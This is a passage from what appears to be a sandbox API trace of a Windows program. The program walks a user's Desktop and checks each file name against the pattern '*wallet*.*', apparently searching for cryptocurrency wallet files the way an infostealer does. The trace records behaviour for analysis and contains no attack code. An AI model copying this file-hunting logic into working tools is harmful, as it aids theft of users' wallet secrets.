lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51556710, ftCreationTime.dwHighDateTime=0x1d7a815, ftLastAccessTime.dwLowDateTime=0xb84e1ac0, ftLastAccessTime.dwHighDateTime=0x1d7a9ff, ftLastWriteTime.dwLowDateTime=0xb84e1ac0, ftLastWriteTime.dwHighDateTime=0x1d7a9ff, nFileSizeHigh=0x0, nFileSizeLow=0x888f, dwReserved0=0x0, dwReserved1=0x0, cFileName="wwAL7t.mp4", cAlternateFileName="")) returned 1 [0110.826] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.826] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.826] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="wwAL7t.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\wwAL7t.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\wwAL7t.mp4" [0110.826] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.826] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.826] lstrcatW (in: lpString1="\\", lpString2="wwAL7t.mp4" | out: lpString1="\\wwAL7t.mp4") returned="\\wwAL7t.mp4" [0110.826] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\wwAL7t.mp4", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0110.826] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2a) returned 0x39700d0 [0110.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\wwAL7t.mp4", cchWideChar=42, lpMultiByteStr=0x39700d0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\wwAL7t.mp4", lpUsedDefaultChar=0x0) returned 42 [0110.827] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.827] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.827] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.827] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970c40 [0110.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970c40, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.827] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706f0 [0110.827] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c40 | out: hHeap=0x29a0000) returned 1 [0110.827] PathMatchSpecW (pszFile="wwAL7t.mp4", pszSpec="*wallet*.*") returned 0 [0110.827] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706f0 | out: hHeap=0x29a0000) returned 1 [0110.827] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.827] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa619a40, ftCreationTime.dwHighDateTime=0x1d7a2e8, ftLastAccessTime.dwLowDateTime=0x562811b0, ftLastAccessTime.dwHighDateTime=0x1d7af50, ftLastWriteTime.dwLowDateTime=0x562811b0, ftLastWriteTime.dwHighDateTime=0x1d7af50, nFileSizeHigh=0x0, nFileSizeLow=0x1057b, dwReserved0=0x0, dwReserved1=0x0, cFileName="XDMAiqRYF.jpg", cAlternateFileName="XDMAIQ~1.JPG")) returned 1 [0110.827] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.827] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.827] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="XDMAiqRYF.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\XDMAiqRYF.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\XDMAiqRYF.jpg" [0110.827] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.827] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.827] lstrcatW (in: lpString1="\\", lpString2="XDMAiqRYF.jpg" | out: lpString1="\\XDMAiqRYF.jpg") returned="\\XDMAiqRYF.jpg" [0110.827] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\XDMAiqRYF.jpg", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0110.827] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2d) returned 0x39700d0 [0110.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\XDMAiqRYF.jpg", cchWideChar=45, lpMultiByteStr=0x39700d0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\XDMAiqRYF.jpg", lpUsedDefaultChar=0x0) returned 45 [0110.827] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.827] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.827] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.827] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970d60 [0110.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970d60, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.827] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970650 [0110.828] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d60 | out: hHeap=0x29a0000) returned 1 [0110.828] PathMatchSpecW (pszFile="XDMAiqRYF.jpg", pszSpec="*wallet*.*") returned 0 [0110.828] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970650 | out: hHeap=0x29a0000) returned 1 [0110.828] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.828] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99eb9cb0, ftCreationTime.dwHighDateTime=0x1d7aca7, ftLastAccessTime.dwLowDateTime=0x28bfee50, ftLastAccessTime.dwHighDateTime=0x1d7ae51, ftLastWriteTime.dwLowDateTime=0x28bfee50, ftLastWriteTime.dwHighDateTime=0x1d7ae51, nFileSizeHigh=0x0, nFileSizeLow=0x1505d, dwReserved0=0x0, dwReserved1=0x0, cFileName="xmxJletH7GW6y.bmp", cAlternateFileName="XMXJLE~1.BMP")) returned 1 [0110.828] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.828] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.828] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="xmxJletH7GW6y.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\xmxJletH7GW6y.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\xmxJletH7GW6y.bmp" [0110.828] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.828] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.828] lstrcatW (in: lpString1="\\", lpString2="xmxJletH7GW6y.bmp" | out: lpString1="\\xmxJletH7GW6y.bmp") returned="\\xmxJletH7GW6y.bmp" [0110.828] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\xmxJletH7GW6y.bmp", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0110.828] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x31) returned 0x38ea558 [0110.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\xmxJletH7GW6y.bmp", cchWideChar=49, lpMultiByteStr=0x38ea558, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\xmxJletH7GW6y.bmp", lpUsedDefaultChar=0x0) returned 49 [0110.828] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2df8 [0110.828] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea558 | out: hHeap=0x29a0000) returned 1 [0110.828] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.828] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970c40 [0110.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970c40, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.828] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706f0 [0110.828] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c40 | out: hHeap=0x29a0000) returned 1 [0110.828] PathMatchSpecW (pszFile="xmxJletH7GW6y.bmp", pszSpec="*wallet*.*") returned 0 [0110.828] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706f0 | out: hHeap=0x29a0000) returned 1 [0110.829] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2df8 | out: hHeap=0x29a0000) returned 1 [0110.829] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf995fa10, ftCreationTime.dwHighDateTime=0x1d7a3b6, ftLastAccessTime.dwLowDateTime=0x6882a8f0, ftLastAccessTime.dwHighDateTime=0x1d7aec6, ftLastWriteTime.dwLowDateTime=0x6882a8f0, ftLastWriteTime.dwHighDateTime=0x1d7aec6, nFileSizeHigh=0x0, nFileSizeLow=0x94d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="yBTl 8ysJ.mp3", cAlternateFileName="YBTL8Y~1.MP3")) returned 1 [0110.829] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.829] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.829] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="yBTl 8ysJ.mp3" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\yBTl 8ysJ.mp3") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\yBTl 8ysJ.mp3" [0110.829] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.829] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.829] lstrcatW (in: lpString1="\\", lpString2="yBTl 8ysJ.mp3" | out: lpString1="\\yBTl 8ysJ.mp3") returned="\\yBTl 8ysJ.mp3" [0110.829] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\yBTl 8ysJ.mp3", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0110.829] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2d) returned 0x39700d0 [0110.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\yBTl 8ysJ.mp3", cchWideChar=45, lpMultiByteStr=0x39700d0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\yBTl 8ysJ.mp3", lpUsedDefaultChar=0x0) returned 45 [0110.829] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.829] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.829] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.829] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970bc0 [0110.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970bc0, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.829] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970560 [0110.829] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970bc0 | out: hHeap=0x29a0000) returned 1 [0110.829] PathMatchSpecW (pszFile="yBTl 8ysJ.mp3", pszSpec="*wallet*.*") returned 0 [0110.829] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970560 | out: hHeap=0x29a0000) returned 1 [0110.829] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.829] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e10ef30, ftCreationTime.dwHighDateTime=0x1d7a5be, ftLastAccessTime.dwLowDateTime=0xe222b410, ftLastAccessTime.dwHighDateTime=0x1d7a972, ftLastWriteTime.dwLowDateTime=0xe222b410, ftLastWriteTime.dwHighDateTime=0x1d7a972, nFileSizeHigh=0x0, nFileSizeLow=0x1616d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZyW0U6HGvR1sY4.mkv", cAlternateFileName="ZYW0U6~1.MKV")) returned 1 [0110.829] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.829] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.829] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="ZyW0U6HGvR1sY4.mkv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\ZyW0U6HGvR1sY4.mkv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\ZyW0U6HGvR1sY4.mkv" [0110.829] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.829] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.830] lstrcatW (in: lpString1="\\", lpString2="ZyW0U6HGvR1sY4.mkv" | out: lpString1="\\ZyW0U6HGvR1sY4.mkv") returned="\\ZyW0U6HGvR1sY4.mkv" [0110.830] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\ZyW0U6HGvR1sY4.mkv", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.830] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x38ea758 [0110.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\ZyW0U6HGvR1sY4.mkv", cchWideChar=50, lpMultiByteStr=0x38ea758, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\ZyW0U6HGvR1sY4.mkv", lpUsedDefaultChar=0x0) returned 50 [0110.830] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2ed0 [0110.830] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea758 | out: hHeap=0x29a0000) returned 1 [0110.830] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.830] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970e20 [0110.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970e20, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.830] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970448 [0110.830] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970e20 | out: hHeap=0x29a0000) returned 1 [0110.830] PathMatchSpecW (pszFile="ZyW0U6HGvR1sY4.mkv", pszSpec="*wallet*.*") returned 0 [0110.830] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbadff6a0, ftCreationTime.dwHighDateTime=0x1d7ab67, ftLastAccessTime.dwLowDateTime=0x51082c40, ftLastAccessTime.dwHighDateTime=0x1d7ad09, ftLastWriteTime.dwLowDateTime=0x51082c40, ftLastWriteTime.dwHighDateTime=0x1d7ad09, nFileSizeHigh=0x0, nFileSizeLow=0xe3d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="_aNuOe6kDQsgIz0qDq.ods", cAlternateFileName="_ANUOE~1.ODS")) returned 1 [0110.830] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.830] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.830] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="_aNuOe6kDQsgIz0qDq.ods" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\_aNuOe6kDQsgIz0qDq.ods") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\_aNuOe6kDQsgIz0qDq.ods" [0110.830] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.830] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.830] lstrcatW (in: lpString1="\\", lpString2="_aNuOe6kDQsgIz0qDq.ods" | out: lpString1="\\_aNuOe6kDQsgIz0qDq.ods") returned="\\_aNuOe6kDQsgIz0qDq.ods" [0110.830] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\_aNuOe6kDQsgIz0qDq.ods", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0110.831] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x36) returned 0x38ea558 [0110.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\_aNuOe6kDQsgIz0qDq.ods", cchWideChar=54, lpMultiByteStr=0x38ea558, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\_aNuOe6kDQsgIz0qDq.ods", lpUsedDefaultChar=0x0) returned 54 [0110.831] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c00 [0110.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.831] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970ba0 [0110.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970ba0, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.831] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970628 [0110.831] PathMatchSpecW (pszFile="_aNuOe6kDQsgIz0qDq.ods", pszSpec="*wallet*.*") returned 0 [0110.831] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbadff6a0, ftCreationTime.dwHighDateTime=0x1d7ab67, ftLastAccessTime.dwLowDateTime=0x51082c40, ftLastAccessTime.dwHighDateTime=0x1d7ad09, ftLastWriteTime.dwLowDateTime=0x51082c40, ftLastWriteTime.dwHighDateTime=0x1d7ad09, nFileSizeHigh=0x0, nFileSizeLow=0xe3d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="_aNuOe6kDQsgIz0qDq.ods", cAlternateFileName="_ANUOE~1.ODS")) returned 0 [0110.831] FindClose (in: hFindFile=0x7436e0 | out: hFindFile=0x7436e0) returned 1 [0110.831] GetLastError () returned 0x12 [0110.831] SetLastError (dwErrCode=0x12) [0110.831] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0110.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3970510, cbMultiByte=31, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0110.831] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3e) returned 0x29a2c48 [0110.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3970510, cbMultiByte=31, lpWideCharStr=0x29a2c48, cchWideChar=31 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned 31 [0110.831] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2978 [0110.831] lstrcpyW (in: lpString1=0x19d240, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.831] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\*.*" [0110.831] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\*.*", lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xdbf44eb, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0xdbf44eb, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743420 [0110.832] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.832] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.832] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="." | out: 